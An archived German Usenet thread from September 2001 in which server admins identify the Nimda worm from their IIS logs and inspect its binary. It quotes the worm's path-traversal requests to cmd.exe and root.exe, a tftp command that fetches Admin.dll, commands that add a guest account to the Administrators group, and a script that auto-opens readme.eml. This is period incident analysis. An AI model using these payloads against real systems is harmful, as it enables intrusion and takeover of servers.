Google Groups unterstützt keine neuen Usenet-Beiträge oder ‑Abos mehr. Bisherige Inhalte sind weiterhin sichtbar.

Neuer Code-Red?

0 Aufrufe
Direkt zur ersten ungelesenen Nachricht

Bruno Berger

ungelesen,
18.09.2001, 10:58:1818.09.01
an
Seite heute 15 Uhr müllen mir diverse Server das Logfile meines Webservers
zu (alle nach dem gleichen Schema), z.B.:

xxx.sv.nl - - [18/Sep/2001:14:47:25 +0000] "GET /scripts/root.exe?/c+dir
HTTP/1.0" 302 394
xxx.sv.nl - - [18/Sep/2001:14:47:49 +0000] "GET /MSADC/root.exe?/c+dir
HTTP/1.0" 302 392
xxx.sv.nl - - [18/Sep/2001:14:47:50 +0000] "GET
/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 402
xxx.sv.nl - - [18/Sep/2001:14:47:54 +0000] "GET
/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 402
xxx.sv.nl - - [18/Sep/2001:14:47:54 +0000] "GET
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 416
xxx.sv.nl - - [18/Sep/2001:14:47:58 +0000] "GET
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 302 433
xxx.sv.nl - - [18/Sep/2001:14:48:03 +0000] "GET
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 302 433

Es scheint, dass dieser den gleichen Fehler nutzt wie die Vorgänger,
irgendwie fehlt aber der Bufferoverflow.
Weiss jemand mehr darüber? Vielen Dank!

Bruno

Die Nachricht wurde gelöscht

Harald Joerg

ungelesen,
18.09.2001, 11:31:3118.09.01
an
Bruno Berger <bruno....@spl.ch> writes:

Das ist kein Code Red.

Da versucht jemand, die Hintertuer, die Code Red hinterlaesst,
auszunutzen. Wenn ein GET /scripts/root.exe?/c+dir klappt, dann
klappt vermutlich auch jedes andere, ggf. boesartige Kommando.....

Hau' dem Absender auf die Finger. Sowas macht man nicht.
--
Cheers,
haj

Jochen Schimpf

ungelesen,
18.09.2001, 11:38:1118.09.01
an
Bruno Berger wrote:

> Seite heute 15 Uhr müllen mir diverse Server das Logfile meines Webservers
> zu (alle nach dem gleichen Schema), z.B.:
>
> xxx.sv.nl - - [18/Sep/2001:14:47:25 +0000] "GET /scripts/root.exe?/c+dir
> HTTP/1.0" 302 394

[Log gesnipt]


>
> Es scheint, dass dieser den gleichen Fehler nutzt wie die Vorgänger,
> irgendwie fehlt aber der Bufferoverflow.
> Weiss jemand mehr darüber? Vielen Dank!
>
> Bruno
>

Das würde mich auch interresieren; bei mir kommen seit ca 15.00 Uhr auch
alle ein bis zwei Minuten Anfragen auf Port 80. Der Port (Dienst auf dem
Port) ist jedoch für die Aussenwelt nicht erreichbar. Die anfragenden
Rechner scheinen nach Stichproben immer Win NT/2000 Rechner zu sein.

Die Anfragen kommen alle aus meinem Subnet (T-Online Dial-Up 217.0.x.x).


Gruß
Jochen

--
Forgive, but never forget!

Horst Laschinsky

ungelesen,
18.09.2001, 11:42:0518.09.01
an
Heiko Schlenker wrote:
>> Weiss jemand mehr dar?ber?

> Hier versucht jemand, Backdoors, die von CodeRed(II) eingerichtet
> worden sind, zu finden.

Scheint aber doch sowas, wie ein Wurm zu sein, offenbar einer, der
den IIS infiziert. Zumindest haengt hinter jeder IP, von der aus
die Eintraege in meinem Log stammen ein IIS, und die Source-IPs
sind immer andere, allerdings alle aus meinem /8er Subnetz.

--
Horst Laschinsky
Universitaet Erlangen-Nuernberg Institut fuer Theoretische Physik III
Staudtstr. 7 - Room: 02.706 - 91058 Erlangen/Germany - Phon: +49 9131 85-28476
http://theorie3.physik.uni-erlangen.de/~htlaschi

Sevo Stille

ungelesen,
18.09.2001, 11:44:2918.09.01
an
Harald Joerg wrote:

> Das ist kein Code Red.

CodeRed nicht. Aber...

> Da versucht jemand, die Hintertuer, die Code Red hinterlaesst,
> auszunutzen.

Das kann auch nicht sein. Denn dazu ist die Intensität viel zu hoch -
ich habe jetzt innerhalb von drei Stunden fast soviele Ursprungs-IPs
festgestellt wie am ersten Tag von CRII. Und auf Incidents haben mehrere
Leute das Muster auch schon gepostet. D.h. da ist der nächste Worm
unterwegs...

Sevo

Bruno Berger

ungelesen,
18.09.2001, 11:47:1518.09.01
an
Harald,

Harald Joerg wrote:
<snip>


> Das ist kein Code Red.
>
> Da versucht jemand, die Hintertuer, die Code Red hinterlaesst,
> auszunutzen. Wenn ein GET /scripts/root.exe?/c+dir klappt, dann
> klappt vermutlich auch jedes andere, ggf. boesartige Kommando.....
>
> Hau' dem Absender auf die Finger. Sowas macht man nicht.

Ne, das ist automatisiert. Die Tatsache, dass es flächenbrandmässig auftritt
deutet auf einen weiteren Wurm hin (der wars. die Backdoors der Codered
nutzt). Ich bin etwas auf den angreifenden Systemen "rumgesurft"... sie sind
offenbar selber befallen (hab da ein Perl Script das mir quasi eine Shell
auf dem System gibt. Es setzt die einzelnen GET Anfragen in einen
Zusammenhang, so dass man quasi wie bei einer Telnet-Sitzung kontinuierlich
arbeiten kann).
Ich habe langsam echt die Nase voll, dieser Wurm (oder was auch immer)
füllt das Logfile mit der zehnfachen Menge an Müll wie der CodeRed.

*nerv*

Bruno

Horst Laschinsky

ungelesen,
18.09.2001, 12:04:2918.09.01
an
Bruno Berger wrote:

> Ne, das ist automatisiert. Die Tatsache, dass es fl?chenbrandm?ssig auftritt


> deutet auf einen weiteren Wurm hin (der wars. die Backdoors der Codered

Wenn man die Source-IP in nen Browser eintippt, erscheint eine Web-
seite (oftmals anscheinend die IIS-Standardseite), von der der
Browser dann eine Datei Namens readme.eml runterladen will, die
offenbar Binaercode enthaelt. Bin grad dabei, zu untersuchen, was
das soll.

Robert Riesenberger

ungelesen,
18.09.2001, 12:28:2418.09.01
an
Horst Laschinsky schrieb:

Hi!



> Browser dann eine Datei Namens readme.eml runterladen will, die
> offenbar Binaercode enthaelt. Bin grad dabei, zu untersuchen, was
> das soll.

Ich habs mal unter test.eml gespeichert.

me@la-bestia:~ > uudeview test.eml
Loaded from test.eml: '' (readme.exe): readme.exe part 1 Base64
Warning: Boundary expected on Multipart message but found EOF

Found 'readme.exe' State 16 Base64 Parts 1 OK

-rw-r--r-- readme.exe is OK [d] (?=help) d
File successfully written to /home/doppel-r/readme.exe
1 file decoded from 1 input file, 0 failed
me@la-bestia:~ >

Wird also ein exe-File. Was das tut? *schulterzuck*

Doppel-R
--
|-----Suzuki GSX-R 750 2001------------------Gilera FXR 1xx Runner-----|
|--Ich will keine Diskussion, ob der Gixxer besser is, als La-Bestia.--|
|-------"DEPPATA!... Des gheat so!" -- W.(C). afm-ST am 24.10.98-------|
PIP #853 http://www.afm.at/doppel-r/RR.jpg http://www.usenet.at RRR #853

Jens Wilke

ungelesen,
18.09.2001, 12:42:1618.09.01
an
On Tue, 18 Sep 2001 16:58:18 +0200, Bruno Berger <bruno....@spl.ch>
wrote:

> Weiss jemand mehr darüber? Vielen Dank!

http://www.datadellows.com/v-descs/nimda.shtml

ist wohl der Übeltäter.

IIS - Durch diese hohle Gasse wird er kommen :->

Bis denne

Jens

Horst Laschinsky

ungelesen,
18.09.2001, 12:42:3618.09.01
an
Robert Riesenberger wrote:

> Found 'readme.exe' State 16 Base64 Parts 1 OK

> [...]


> Wird also ein exe-File. Was das tut? *schulterzuck*

htlaschi@platon:~$ strings readme.exe | less
liefert unter anderem folgendes:

==========

/scripts
/MSADC
/scripts/..%255c..
/_vti_bin/..%255c../..%255c../..%255c..
/_mem_bin/..%255c../..%255c../..%255c..
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c..
/scripts/..%c1%1c..
/scripts/..%c0%2f..
/scripts/..%c0%af..
/scripts/..%c1%9c..
/scripts/..%%35%63..
/scripts/..%%35c..
/scripts/..%25%35%63..
/scripts/..%252f..
/root.exe?/c+
/winnt/system32/cmd.exe?/c+
net%%20use%%20\\%s\ipc$%%20""%%20/user:"guest"
tftp%%20-i%%20%s%%20GET%%20Admin.dll%%20
Admin.dll
c:\Admin.dll
d:\Admin.dll
e:\Admin.dll
<html><script language="JavaScript">window.open("readme.eml", null, "resizable=no,top=6000,left=6000"
)</script></html>
/Admin.dll
GET %s HTTP/1.0

============

Hab grad kein Windows da, um's zu testen, aber ich vermute mal, das
ist das Teil, dass sich dann auf der Kiste einnistet und versucht,
weitere hosts im gleichen 8er-Subnetz zu connecten/infizieren.

Ciao,

Horst

Harald Joerg

ungelesen,
18.09.2001, 12:44:3818.09.01
an
Sevo Stille <se...@radiox.de> schreibt:

Ich habe nicht sagen wollen, dass der "jemand" *von Hand* arbeitet.
Aber irgendwie war doch damit zu rechnen, dass frueher oder spaeter
jemand die "Ernte" von Code Red einfahren wollen wuerde - das muss ja
noch nicht mal der Code Red-Autor sein.

Das, was da jetzt umherspukt, sollte aber wenigstens "empfindlicher" auf
die (beim eigentlichen Code Red voellig wirkungslosen) Bremsversuche
durch laaaangsame Lieferung einer HTTP-Response reagieren. Wenn der
Angriff nicht bloss ein dummer Scherz ist, dann will der Angreifer
wissen, ob ein 200er-Ergebnis kommt und wird drauf warten.
--
Cheers,
haj

Jens Wilke

ungelesen,
18.09.2001, 12:50:1618.09.01
an
Nachtrag:

Für Sophos-Benutzer gibts schon 'ne aktual. Sig.

http://www.sophos.com/virusinfo/analyses/w32nimdaa.html

Bis denne

Jens

Matthias Leisi

ungelesen,
18.09.2001, 13:19:0518.09.01
an
Jens Wilke in de.comp.security.misc:

>http://www.datadellows.com/v-descs/nimda.shtml

Aus readme.exe:

--- cut ---
Concept Virus(CV) V.5, Copyright(C)2001 R.P.China
[..]
share c$=c:\
user guest ""
localgroup Administrators guest /add
localgroup Guests guest /add
user guest /active
open
user guest /add
[..]


net%%20use%%20\\%s\ipc$%%20""%%20/user:"guest"
tftp%%20-i%%20%s%%20GET%%20Admin.dll%%20

[..]


Admin.dll
c:\Admin.dll
d:\Admin.dll
e:\Admin.dll

[..]
MAPISendMail
[..]
Subject:
From: <
DATA
RCPT TO: <
MAIL FROM: <
HELO
[..]
Content-ID: <EA4DMGBP9p>
[..]
\load.exe
\mmc.exe
\readme*.exe
\readme.eml
\riched20.dll
\system.ini
\wininit.ini
[..]
--- cut ---

Gruss,
Matthias

--
Vermutlich wird die positive Wirkung von Werbung im usenet seitens der
Werbenden ohnehin hoffnungslos überschätzt. Was im Kino durchaus noch
erwünscht, im Fensehen als Gelegenheit zum Pinkeln benutzt, wird im
usenet eben mit Bots bekämpft. Markus Luft in de.admin.net-abuse.news

Stefan Rusche

ungelesen,
18.09.2001, 13:22:0918.09.01
an

"Sevo Stille" <se...@radiox.de> schrieb im Newsbeitrag
news:3BA76BDD...@radiox.de...

> Das kann auch nicht sein. Denn dazu ist die Intensität viel zu hoch -
> ich habe jetzt innerhalb von drei Stunden fast soviele Ursprungs-IPs
> festgestellt wie am ersten Tag von CRII. Und auf Incidents haben mehrere
> Leute das Muster auch schon gepostet. D.h. da ist der nächste Worm
> unterwegs...

Habe ich auch als Verdacht: wie schon gepostet alles aus dem 217/8 Netz -
hostanfragen liefern aber auch andere Anbieter als T-Online (Frankreich,
z.B.); dafür dass das erst heute seit 15-16 Uhr rumnervt, ist das aber ganz
schön wet verbreitet - das spricht eigentlich tatsächlich dafür, dass eine
zuvor geschaffene Backdoor ausgenutzt wird. Übrigens liefert ein grep
/winnt/ /var/log/httpd/access_log -c bei mir seit 15:56 1123 Einträge - das
hat CodeRed in allen Varianten nicht seit Juli hinbekommen... und ich bin
eigentlich nur per DSL-Flat drin, normalerweise habe ich gar keinen
eingehenden Traffic, bis auf das übliche "Hintergrundrauschen".

Gruß,

Stefan


Stefan Rusche

ungelesen,
18.09.2001, 13:29:2318.09.01
an
Ich habe hier auch noch einen Link:

http://slashdot.org/articles/01/09/18/151203.shtml

Gruß,

Stefan


Harald Laabs

ungelesen,
18.09.2001, 13:32:1618.09.01
an
Sevo Stille <se...@radiox.de> schrieb:

>Harald Joerg wrote:
>
>> Das ist kein Code Red.
>
>CodeRed nicht. Aber...
>
>> Da versucht jemand, die Hintertuer, die Code Red hinterlaesst,
>> auszunutzen.
>
>Das kann auch nicht sein. Denn dazu ist die Intensität viel zu hoch -

Nein. Es ist vermutlich aehnlich effizient wie CR2 programmiert,
aber ohne eine nicht optimierte Release1 zur Warnung.
(OK, CR1+2 haetten da reichen sollen, aber die Idioten sterben nicht
aus....)

>ich habe jetzt innerhalb von drei Stunden fast soviele Ursprungs-IPs
>festgestellt wie am ersten Tag von CRII. Und auf Incidents haben mehrere
>Leute das Muster auch schon gepostet. D.h. da ist der nächste Worm
>unterwegs...

~490 Zugriffe von 25 verschiedenen Hosts. Morgen mal die Teergruben
anpassen.

Gruss,
Harald
--
Failure is not an option. It comes bundled with your Microsoft product.
(Ferenc Mantfeld)

Peter Suetterlin

ungelesen,
18.09.2001, 13:43:3518.09.01
an
"Stefan Rusche" <gowr...@web.de> writes:

> Habe ich auch als Verdacht: wie schon gepostet alles aus dem 217/8
> Netz - hostanfragen liefern aber auch andere Anbieter als T-Online
> (Frankreich, z.B.);

Hier läuft mir auch das Log voll, aber (bislang noch) kommen alle
Anfragen aus dem 'nahen' Netz der Uni. Sieht also so aus als würde
der wirklich erst das lokale Netz abgrasen.

> dafür dass das erst heute seit 15-16 Uhr rumnervt, ist das aber ganz
> schön wet verbreitet - das spricht eigentlich tatsächlich dafür,
> dass eine zuvor geschaffene Backdoor ausgenutzt wird. Übrigens
> liefert ein grep /winnt/ /var/log/httpd/access_log -c bei mir seit
> 15:56 1123 Einträge - das hat CodeRed in allen Varianten nicht seit
> Juli hinbekommen...

dito hier (1130). default.id kommt gerade mal auf 762 seit Aug 1

Dieses readme.exe (mit strings angeschaut) zeigt schon ein paar
interessante Sachen:

user guest ""
localgroup Administrators guest /add
localgroup Guests guest /add
user guest /active
open
user guest /add

usw....

Pit

--
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Dr. Peter "Pit" Suetterlin http://www.astro.uu.nl/~suetter
Sterrenkundig Instituut Utrecht
Tel.: +31 (0)30 253 5225 P.Suet...@astro.uu.nl
__________________________________________________________________________

Die Nachricht wurde gelöscht

Urs [Ayahuasca] Traenkner

ungelesen,
18.09.2001, 13:57:2918.09.01
an
Heiko Schlenker wrote:

> * Horst Laschinsky <htla...@theorie3.physik.uni-erlangen.de> schrieb:


> > htlaschi@platon:~$ strings readme.exe | less
> > liefert unter anderem folgendes:

> [...]


> Concept Virus(CV) V.5, Copyright(C)2001 R.P.China

Ist das dieses "Code Blue"-Dings, was neulich mal auf heise
erwaehnt war?

Gruss Urs...
--
Widerlich, adj. - Eigenart fremder Meinungen

Ambrose Bierce, Des Teufels Woerterbuch

Stefan Laesche

ungelesen,
18.09.2001, 13:51:5418.09.01
an
Moin

Peter Suetterlin <p...@phys.uu.nl> wrote:

> Hier läuft mir auch das Log voll, aber (bislang noch) kommen alle
> Anfragen aus dem 'nahen' Netz der Uni. Sieht also so aus als würde
> der wirklich erst das lokale Netz abgrasen.

Hier (uni-hannover) laufen seit 15:33 die ersten Meldungen auf. Seit dem
gabs 1246 Eintraege ins Log. Das scheint kein Scriptkiddie zu sein, sieht
nach was automatischem, sich selbst verbreitendem aus.

gruesse
stefan

Urs [Ayahuasca] Traenkner

ungelesen,
18.09.2001, 14:09:1118.09.01
an
Stefan Rusche wrote:

> Ich habe hier auch noch einen Link:
> http://slashdot.org/articles/01/09/18/151203.shtml

Na da ist die Kacke aber wirklich am Dampfen. Das ist gar nicht IIS
spezifisch, so wie es aussieht.

Zitat: Update Web servers compromised by this worm apparently
attach a "readme.eml" to all web pages served... and due to a bug
in IE5, it will automatically execute the file! Yay Internet
Explorer!

Unlustig.

Stefan Laesche

ungelesen,
18.09.2001, 14:15:3318.09.01
an
Moin

Jens Wilke <J.W...@wiso.uni-dortmund.de> wrote:

> http://www.datadellows.com/v-descs/nimda.shtml

> ist wohl der Übeltäter.

Jetzt frage ich mich nur noch, wer so daemlich sein kann und eine .exe
Datei oeffnet.

OK, ok, ich kanns mir denken.

gruesse
stefan

Michael H. Fischer

ungelesen,
18.09.2001, 14:40:2918.09.01
an
Heiko Schlenker <hsc...@gmx.de> schreibselte am 18 Sep 2001:

> Concept Virus(CV) V.5, Copyright(C)2001 R.P.China

http://www.heise.de/newsticker/data/pab-18.09.01-000/

Michael H. Fischer
--
http://www.derfisch.de/ntminifaq.htm
http://www.derfisch.de/ntfree.htm
http://www.derfisch.de/ntlinks.html

Matthias Leisi

ungelesen,
18.09.2001, 15:05:0418.09.01
an
Harald Laabs in de.comp.security.misc:

>~490 Zugriffe von 25 verschiedenen Hosts. Morgen mal die Teergruben
>anpassen.

23 Hosts, 868 Requess -- manche Hosts kommen mehrfach, siehe [1]

Gruss,
Matthias

[1] http://trillian.net.astrum.ch/nimda.html

Martin Hermanowski

ungelesen,
18.09.2001, 14:22:0718.09.01
an

Bei uns auch und laut Bugtraq ueberall...
Neben den obigen Vulnerabilities testet der Wurm (ist es wohl) IIRC auch
auf einige CodeRedII-`Freigaben'.
Wobei ein `dir c:' nicht so gefaehrlich sein sollte. Weiss schon jemand,
was passiert wenn es einen verwundbaren IIS trifft?

MfG
Martin

--
PGP/GPG encrypted mail preferred, see header
,--
| Nur tote Fische schwimmen mit dem Strom
`--

Florian Weimer

ungelesen,
18.09.2001, 17:04:1218.09.01
an
Martin Hermanowski <maherm...@mh57.net> writes:

> was passiert wenn es einen verwundbaren IIS trifft?

Wir haben den derzeitgen Stand der Erkenntnis (anderer)
zusammengefaßt:

http://cert.uni-stuttgart.de/ticker/article.php?mid=480

Gewisse syntaktische Unzulänglichkeiten bitte ignorieren.

Stefan Froehlich

ungelesen,
18.09.2001, 16:59:4918.09.01
an
Hallo Pit,

On 18 Sep 2001 17:43:35 GMT Peter Suetterlin <p...@phys.uu.nl> wrote:
> Hier läuft mir auch das Log voll, aber (bislang noch) kommen alle
> Anfragen aus dem 'nahen' Netz der Uni. Sieht also so aus als würde
> der wirklich erst das lokale Netz abgrasen.

Ersetze "erst" durch "vorwiegend", nach meinen Beobachtungen.

>> Übrigens liefert ein grep /winnt/ /var/log/httpd/access_log -c bei
>> mir seit 15:56 1123 Einträge - das hat CodeRed in allen Varianten
>> nicht seit Juli hinbekommen...

> dito hier (1130). default.id kommt gerade mal auf 762 seit Aug 1

Ich habe mir einmal einen meiner Server angesehen, auf dem ca. 60
verschiedene vhosts mit eigener IP laufen (alle im gleichen /24er
Block). Was mich verbluefft, ist folgendes (Zahlen sind fuer die
Zugriffe der letzten zwei Stunden):

| $ grep -c "/winnt/" */*www_access* |cut -d: -f2 |sort -n |tail -10
| 338
| 350
| 350
| 355
| 357
| 379
| 387
| 574
| 793
| 1273

Die am schwaechsten betroffenen IP-Adresse hat 112 Treffer, der Schnitt
liegt bei ca. 250, schaetze ich. Ob da der Zufallsgenerator seinen Namen
nicht ganz verdient? Auf keinen Fall korellieren die Werte irgendwie mit
Bekanntheit der Domain, Zugriffszahlen oder der Anzahl der auf die
gehostete Domain zeigenden Links.

Servus,
Stefan

PS: urgs. Der Wert fuer die am meisten betroffene Domain ist inzwischen
schon auf 1315, nur waehrend der paar Zeilen

--
Stefan - die schrecklichste Steigerung von leis!
http://www.sloganizer.de/

Andreas Ferber

ungelesen,
18.09.2001, 17:41:0618.09.01
an
* Heiko Schlenker <hsc...@gmx.de> schrieb:
>
> Jein, der neue Wurm versucht, mehrere Schwachstellen auszunutzen,
> siehe auch
> "http://cert.uni-stuttgart.de/ticker/article.php?mid=480".

"Würmer", "Viren"... Man könnte die doch auch "Antikörper" nennen, das
Internet wehrt sich gegen die Invasion durch Millionen von Winlusern.
Und dabei kommt es eben auch zu Fieber und Entzündungen (= anwachsende
Logfiles auf eigentlich "gesunden" Webservern).

SCNR, Andreas

PS: Bitte Smilies an geeigneten Stellen einstreuen ;-)
--
Andreas Ferber - dev/consulting GmbH - Bielefeld, FRG
---------------------------------------------------------
+49 521 1365800 - a...@devcon.net - www.devcon.net

Bettina Fink

ungelesen,
18.09.2001, 19:29:5718.09.01
an
Stefan Froehlich <Stefan...@froehlich.priv.at> wrote:

> PS: urgs. Der Wert fuer die am meisten betroffene Domain ist inzwischen
> schon auf 1315, nur waehrend der paar Zeilen

Ich habe gerade nur mal die Logs der Apaches unserer User-
Homepages durchgeschaut:

Bis jetzt schon über 1.000.000 Requests durch W32.Nimda.A@mm.

Urs [Ayahuasca] Traenkner

ungelesen,
18.09.2001, 19:42:5218.09.01
an
Stefan Laesche wrote:

> Jetzt frage ich mich nur noch, wer so daemlich sein kann und eine .exe
> Datei oeffnet.

Bei diesem Wurm musst Du das gar nicht, so wie es aussieht. Das
macht OE oder der IE ganz fuer Dich allein.

Sprich, wer auf eine Webseite mit infiziertem Webserver kommt und
Javaskript in seinem IE anhat, kriegt ihn. Wer ihn als Mail bekommt
und einen ungepatchten OE (manche Versionen) nutzt, kriegt ihn.

Und _das_ ist wirklich hart.

Jens Wilke

ungelesen,
19.09.2001, 06:00:1619.09.01
an
Nachtrag, der 2te,

Es werden *höchstwahrscheinlich* auch voll gepatchte und vorher nicht
infizierte IIS befallen. Außerdem ist ja inzwischen die IE-Lücke (auch
v5.5 ist betroffen, einen PC haben wir schon abgeklemmt) bekannt, die
auch ohne eigenes Zutun (bitte wer hat schon Javascript
ausgeschaltet?) funkt.

Übrigens fragt Netscape - zum Glück *noch* -, ob die Anwendung
ausgeführt werden soll, es ist also nur eine Frage der Zeit, daß auch
Opera, Netscape und Co. betroffen sein werden.

Also nicht hämisch werden, lieber die eigenen Systeme scannen und bei
Befund direkt von CD neu installieren.

Ich denke, da wird noch einiges auf uns zukommen...

Bis denne

Jens

Stefan Laesche

ungelesen,
19.09.2001, 06:46:1119.09.01
an
Moin

Jens Wilke <J.W...@wiso.uni-dortmund.de> wrote:

> Nachtrag, der 2te,

> Es werden *höchstwahrscheinlich* auch voll gepatchte und vorher nicht
> infizierte IIS befallen.

Warum?

> Außerdem ist ja inzwischen die IE-Lücke (auch
> v5.5 ist betroffen, einen PC haben wir schon abgeklemmt) bekannt, die
> auch ohne eigenes Zutun (bitte wer hat schon Javascript
> ausgeschaltet?) funkt.

Auf einem Server (auf Workstations hat der IIS nichts zu suchen) sollte man
IMHO tunlichst alles unterlassen, was die Sicherheit gefaehrdet. Im Internet
zu surfen oder Mails mit Outlook zu lesen gehoert eindeutig in diese
Kategorie.

> Übrigens fragt Netscape - zum Glück *noch* -, ob die Anwendung
> ausgeführt werden soll, es ist also nur eine Frage der Zeit, daß auch
> Opera, Netscape und Co. betroffen sein werden.

Nur solange $LUSER das nicht abschaltet.

> Also nicht hämisch werden, lieber die eigenen Systeme scannen und bei
> Befund direkt von CD neu installieren.

Tolle Idee. Du hast nur vergessen, dass Du waehrend der Installation die
Netzwerkverbindung trennst und zwar so lange, bis Du alle Service Packs und
Patches installiert hast. Viel Spass dass Deinem Arbeitgeber zu verklickern
(Sorry Boss, aber www.$FIRMENNAME.de ist fuer 5 Stunden Offline). Da moechte
ich nicht in Deiner Haut stecken :-)

> Ich denke, da wird noch einiges auf uns zukommen...

Ja, grosse Logfiles bei allen Apache Servern. Die anderen muessen ja
regelmaessig neu installiert werden :-]

gruesse
stefan

Johann Burkard

ungelesen,
19.09.2001, 07:12:5019.09.01
an
Bruno Berger wrote:

> Seite heute 15 Uhr müllen mir diverse Server das Logfile meines Webservers
> zu (alle nach dem gleichen Schema), z.B.:

Schlug hier auch ein, u.A.:

216.217.224.135 - - [19/Sep/2001:12:12:44 +0200] "GET
/scripts/root.exe?/c+dir HTTP/1.0" 404 0 "-" "-"

Und jetzt kuckt mal, was sich hinter http://216.217.224.135/ verbirgt
(allerdings nicht mit dem IE). :-)

Johann
--

Du versuchst die kriminellen Handlungen zu verniedlichen und mich
persönlich zu beleidigen?
(Das Merlin in <9hn9pt897tfjnu5sd...@4ax.com>)

Helmar Weser

ungelesen,
19.09.2001, 07:37:1119.09.01
an
Johann Burkard schrieb:

>
> Schlug hier auch ein, u.A.:
>
> 216.217.224.135 - - [19/Sep/2001:12:12:44 +0200] "GET
> /scripts/root.exe?/c+dir HTTP/1.0" 404 0 "-" "-"
>
> Und jetzt kuckt mal, was sich hinter http://216.217.224.135/ verbirgt
> (allerdings nicht mit dem IE). :-)

Autsch!! "Speichern der Datei readme.eml unter?", kam hier (NS4.75). Kann
denn Bill so doof sein, dass nicht mal die eigenen Patches auf den eigenen
Websites implementiert sind?

--
MfG Helmar

GSM-Roaming mit Preisen weltweit und Infos zu Interkom mit
Einstieg zum Viag-Diskussionsforum bei eGroups
http://www.generic-link.de/ + http://www.roamingpartner.de/

Peter Suetterlin

ungelesen,
19.09.2001, 08:03:5819.09.01
an
Helmar Weser <do.not...@gmx.net> writes:
> Johann Burkard schrieb:

>> Und jetzt kuckt mal, was sich hinter http://216.217.224.135/ verbirgt
>> (allerdings nicht mit dem IE). :-)

> Autsch!! "Speichern der Datei readme.eml unter?", kam hier
> (NS4.75). Kann denn Bill so doof sein, dass nicht mal die eigenen
> Patches auf den eigenen Websites implementiert sind?

Nee, das ist irgend 'ne Default-Installation (da wird ja der Webserver
automatisch aktiviert) und kein MS-eigener Rechner.

Aber kannst ja mal 'seine' Sites abklappern - vielleicht hat's schon
einen erwischt....

Oliver J. Morais

ungelesen,
19.09.2001, 07:58:3819.09.01
an
On Wed, 19 Sep 2001 13:37:11 +0200, Helmar Weser wrote:
> Johann Burkard schrieb:

>> 216.217.224.135 - - [19/Sep/2001:12:12:44 +0200] "GET
>> /scripts/root.exe?/c+dir HTTP/1.0" 404 0 "-" "-"
> Autsch!! "Speichern der Datei readme.eml unter?", kam hier (NS4.75). Kann
> denn Bill so doof sein, dass nicht mal die eigenen Patches auf den eigenen
> Websites implementiert sind?

(3):[oliver@behemoth][~] whois -a 216.217.224.135
Warning: RIPE flags ignored for a traditional server.
@Home Network / @Work Division (NETBLK-ATWORK-6)
425 Broadway
Redwood City, CA 94063
US

Netname: ATWORK-6
Netblock: 216.216.0.0 - 216.217.255.255
Maintainer: WORK

Coordinator:
Operations, Network (HOME-NOC-ARIN) noc-...@noc.home.net
(650) 556-5599

Domain System inverse mapping provided by:

NS1.HOME.NET 24.0.0.27
NS2.HOME.NET 24.2.0.27

ADDRESSES WITHIN THIS BLOCK ARE NON-PORTABLE

Record last updated on 17-Sep-1999.
Database last updated on 18-Sep-2001 23:14:24 EDT.

The ARIN Registration Services Host contains ONLY Internet
Network Information: Networks, ASN's, and related POC's.
Please use the whois server at rs.internic.net for DOMAIN related
Information and whois.nic.mil for NIPRNET Information.


Schaut eher nach @home als nach M$ aus. Obwohl der Link natürlich
genial ist. (Achja, wg. Patches: War da nicht was mit Hotmail und CR?
Hehehe.)

baba,
o.

--
begin yvkBpjen.exe
YU7ebL3t6F8wOmfvK+grD+nNTvO6oN0lTu/K7fmDUG9+0azWZ5
Rf2Tq9EeGAP2TetowwAtqoZQG8/BdMQF12fANyqi5O8lbDKveS
end

Ulrich Eckhardt

ungelesen,
19.09.2001, 09:27:0619.09.01
an
Johann Burkard wrote:
>
> Bruno Berger wrote:
>
> > Seite heute 15 Uhr müllen mir diverse Server das Logfile meines Webservers
> > zu (alle nach dem gleichen Schema), z.B.:
>
> Schlug hier auch ein, u.A.:
>
> 216.217.224.135 - - [19/Sep/2001:12:12:44 +0200] "GET
> /scripts/root.exe?/c+dir HTTP/1.0" 404 0 "-" "-"
>
> Und jetzt kuckt mal, was sich hinter http://216.217.224.135/ verbirgt
> (allerdings nicht mit dem IE). :-)

Hi,

Microsoft hat andere Adressen:

Netname: MICROSOFT-GLOBAL-NET
Netblock: 207.46.0.0 - 207.46.255.255

Uli
--
Ulrich Eckhardt Tr@nscom
http://www.uli-eckhardt.de http://www.transcom.de
Lagerstraße 11-15 A8
64807 Dieburg Germany

Jochen Arndt

ungelesen,
19.09.2001, 09:18:0819.09.01
an
Johann Burkard schrieb:

> 216.217.224.135 - - [19/Sep/2001:12:12:44 +0200] "GET
> /scripts/root.exe?/c+dir HTTP/1.0" 404 0 "-" "-"
>
> Und jetzt kuckt mal, was sich hinter http://216.217.224.135/ verbirgt

joe@comm:~ > whois -h whois.thur.de 216.217.224.135
Process query: '216.217.224.135'
Query recognized as IP.
Querying whois.arin.net:43 with whois.

@Home Network / @Work Division (NETBLK-ATWORK-6)
425 Broadway
Redwood City, CA 94063
US

Netname: ATWORK-6
Netblock: 216.216.0.0 - 216.217.255.255

[...]

Und? Ein ISP.

> (allerdings nicht mit dem IE). :-)

Wieso nicht?
-> Skripte sind normalerweise sicher. Soll die Ausführung von Skripten
zugelassen werden?
-> Aber ja doch!
-> Taskleiste: Error: The requested...
-> Ansicht - Quelltext anzeigen

Na ja. Ein infizierter IIS. Ist ja z.Zt. nichts besonderes.

Also:

1. Nicht jede Default IIS Startseite liegt auf einem MS Server (eher die
wenigsten)
2. Auch mit dem IE darf man

Joe

Jens Wilke

ungelesen,
19.09.2001, 10:33:5619.09.01
an
On 19 Sep 2001 10:46:11 GMT, Stefan Laesche <S.La...@gmx.li> wrote:

> > Es werden *höchstwahrscheinlich* auch voll gepatchte und vorher nicht
> > infizierte IIS befallen.
>
> Warum?

Weil ein Server (nicht bei uns) befallen wurde, der gepatcht/sauber
war, deshalb auch *höchstwahrscheinlich*, da aus 2ter Hand.

> > Außerdem ist ja inzwischen die IE-Lücke (auch
> > v5.5 ist betroffen, einen PC haben wir schon abgeklemmt) bekannt, die
> > auch ohne eigenes Zutun (bitte wer hat schon Javascript
> > ausgeschaltet?) funkt.
>
